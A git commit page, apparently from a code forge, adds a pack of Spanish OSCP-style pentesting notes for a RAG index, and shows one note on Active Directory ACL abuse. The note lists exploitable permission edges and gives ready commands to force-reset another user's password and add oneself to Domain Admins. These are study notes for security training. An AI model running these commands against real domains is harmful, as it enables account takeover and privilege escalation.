saber: pack de metodologia publico (conocimiento/) + doc del RAG
El repo trae ahora ~73 docs de metodologia de pentesting (estilo OSCP, scrubeados de datos personales) que indexa.py indexa: un clon recien hecho ya sabe de enumeracion, explotacion web, shells, privesc, Active Directory, cracking... con los comandos, sin ningun dato privado. docs/rag.md lo refleja.
This commit is contained in:
parent
12987539a4
commit
7e06ce46cf
76 changed files with 2682 additions and 8 deletions
|
|
@ -0,0 +1,25 @@
|
|||
# ACL abuses
|
||||
|
||||
> Permisos mal configurados sobre objetos de AD que te dejan escalar. **BloodHound te los pinta** como aristas. Camino de Active Directory.
|
||||
|
||||
## Las aristas peligrosas
|
||||
```
|
||||
GenericAll → control total sobre el objeto
|
||||
WriteDACL → te das a ti mismo cualquier permiso
|
||||
AddMember → te metes en un grupo (ej. Domain Admins)
|
||||
ForceChangePassword → cambias la pass de otro usuario sin saber la actual
|
||||
GenericWrite → modificar atributos (ej. añadir SPN → Kerberoasting dirigido)
|
||||
```
|
||||
|
||||
## Explotación típica (con bloodyAD / PowerView / impacket)
|
||||
```bash
|
||||
# ForceChangePassword:
|
||||
net rpc password "victima" "NuevaPass123!" -U "dominio/yo%mipass" -S DC_IP
|
||||
# AddMember a un grupo:
|
||||
bloodyAD -d corp.local -u yo -p pass --host DC add groupMember "Domain Admins" yo
|
||||
```
|
||||
|
||||
## Encadenado
|
||||
Una arista lleva a otra → BloodHound calcula el **camino** hasta Domain Admins → puede acabar en DCSync.
|
||||
|
||||
Relacionado: BloodHound · LAPS · OSCP MOC
|
||||
Loading…
Add table
Add a link
Reference in a new issue